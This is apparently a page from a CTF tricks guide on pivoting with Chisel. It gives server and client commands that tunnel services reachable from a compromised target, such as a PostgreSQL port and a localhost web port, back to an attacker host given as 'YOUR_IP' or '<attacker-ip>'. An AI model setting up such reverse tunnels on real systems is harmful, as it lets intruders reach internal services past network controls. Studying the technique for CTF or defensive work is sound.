> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-10/ssh/port-forwarding/trick-0183.md).

# Port Forwarding via Chisel

***

To forward a remote port (e.g., `172.22.0.1:5432` accessible from a compromised target) back to your local machine (attacker), you can use Chisel in reverse mode.

First, set up the Chisel server on your attacker machine, listening on a chosen port and enabling reverse tunneling:

```bash
./chisel server --port 5555 --reverse
```

The `--reverse` flag is used on the server side to indicate that it is ready to accept reverse tunnel connections from clients.

Then, on the target machine (from which the remote service is reachable), run the Chisel client. Connect back to your attacker IP and specify the reverse port forward using the `R:` flag. The syntax for the reverse forward is `R:<server_port>:<client_host>:<client_port>`. This maps the service running on `<client_host>:<client_port>` (as seen from the client machine) to `127.0.0.1:<server_port>` on the attacker machine. Replace `YOUR_IP` with your attacker machine's IP address.

```bash
./chisel client -v YOUR_IP:5555 R:5432:172.22.0.1:5432
```

This command tells the client to connect to the Chisel server located at `YOUR_IP:5555` and set up a reverse tunnel. The `R:5432:172.22.0.1:5432` part specifies that any connection made to port `5432` on the server (your attacker machine) should be forwarded to `172.22.0.1:5432` on the client (the target machine). This makes the service running on `172.22.0.1:5432` available on your attacker machine at `127.0.0.1:5432`.

For example, to forward a service running on the victim's localhost port 80 (`127.0.0.1:80` from the client's perspective) back to your attacker machine on port 8080, the client command would be:

```bash
chisel client <attacker-ip>:8000 R:8080:127.0.0.1:80
```

This will forward the victim’s `127.0.0.1:80` to your attacker’s `127.0.0.1:8080`. This command forwards traffic from the client's `127.0.0.1:80` to the server's `127.0.0.1:8080`.
